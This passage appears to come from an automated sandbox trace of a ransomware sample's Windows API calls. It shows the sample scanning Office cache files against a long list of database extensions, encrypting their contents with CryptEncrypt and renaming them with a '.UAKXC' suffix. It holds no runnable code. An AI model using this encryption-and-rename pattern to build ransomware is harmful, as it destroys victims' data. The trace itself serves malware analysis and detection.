Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avhd") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmrs") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhdx") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avdx") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmcx") returned 0x0 [0148.063] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".iso") returned 0x0 [0148.063] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.064] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0148.134] WriteFile (in: hFile=0x6f0, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0148.134] SetEndOfFile (hFile=0x6f0) returned 1 [0148.135] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.135] ReadFile (in: hFile=0x6f0, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x75e, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x75e, lpOverlapped=0x0) returned 1 [0148.135] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xfffff8a2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.135] WriteFile (in: hFile=0x6f0, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x75e, lpOverlapped=0x0) returned 1 [0148.135] CloseHandle (hObject=0x6f0) returned 1 [0148.136] GetProcessHeap () returned 0xea0000 [0148.136] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0148.136] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" [0148.136] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" [0148.136] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.uakxc")) returned 1 [0148.232] GetProcessHeap () returned 0xea0000 [0148.232] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0148.232] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1370 | out: hHeap=0xea0000) returned 1 [0148.232] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6970 | out: hHeap=0xea0000) returned 1 [0148.232] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0148.232] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0148.233] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0148.233] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 0x2020 [0148.241] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0148.242] GetLastError () returned 0x0 [0148.242] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=1450) returned 1 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".4dd") returned 0x0 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".4dl") returned 0x0 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".accdb") returned 0x0 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".accdc") returned 0x0 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".accde") returned 0x0 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".accdr") returned 0x0 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".accdt") returned 0x0 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".accft") returned 0x0 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".adb") returned 0x0 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".ade") returned 0x0 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".adf") returned 0x0 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".adp") returned 0x0 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".arc") returned 0x0 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".ora") returned 0x0 [0148.242] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".alf") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".ask") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".btr") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".bdf") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".cat") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".cdb") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".ckp") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".cma") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".cpd") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dacpac") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dad") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dadiagrams") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".daschema") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".db") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".db-shm") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".db-wal") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".db3") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dbc") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dbf") returned 0x0 [0148.243] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dbs") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dbt") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dbv") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dbx") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dcb") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dct") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dcx") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".ddl") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dlis") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dp1") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dqy") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dsk") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dsn") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dtsx") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".dxl") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".eco") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".ecx") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".edb") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".epim") returned 0x0 [0148.244] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".exb") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".fcd") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".fdb") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".fic") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".fmp") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".fmp12") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".fmpsl") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".fol") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".fp3") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".fp4") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".fp5") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".fp7") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".fpt") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".frm") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".gdb") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".grdb") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".gwi") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".hdb") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".his") returned 0x0 [0148.245] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".ib") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".idb") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".ihx") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".itdb") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".itw") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".jet") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".jtx") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".kdb") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".kexi") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".kexic") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".kexis") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".lgc") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".lwx") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".maf") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".maq") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".mar") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".mas") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".mav") returned 0x0 [0148.246] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".mdb") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".mdf") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".mpd") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".mrg") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".mud") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".mwb") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".myd") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".ndf") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".nnt") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".nrmlib") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".ns2") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".ns3") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".ns4") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".nsf") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".nv") returned 0x0 [0148.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".nv2") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".nwdb") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".nyf") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".odb") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".oqy") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".orx") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".owc") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".p96") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".p97") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".pan") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".pdb") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".pdm") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".pnz") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".qry") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".qvd") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".rbf") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".rctd") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".rod") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".rodx") returned 0x0 [0148.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".rpd") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".rsd") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".sas7bdat") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".sbf") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".scx") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".sdb") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpSrch=".sdc") returned 0x0 [0148.249] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", 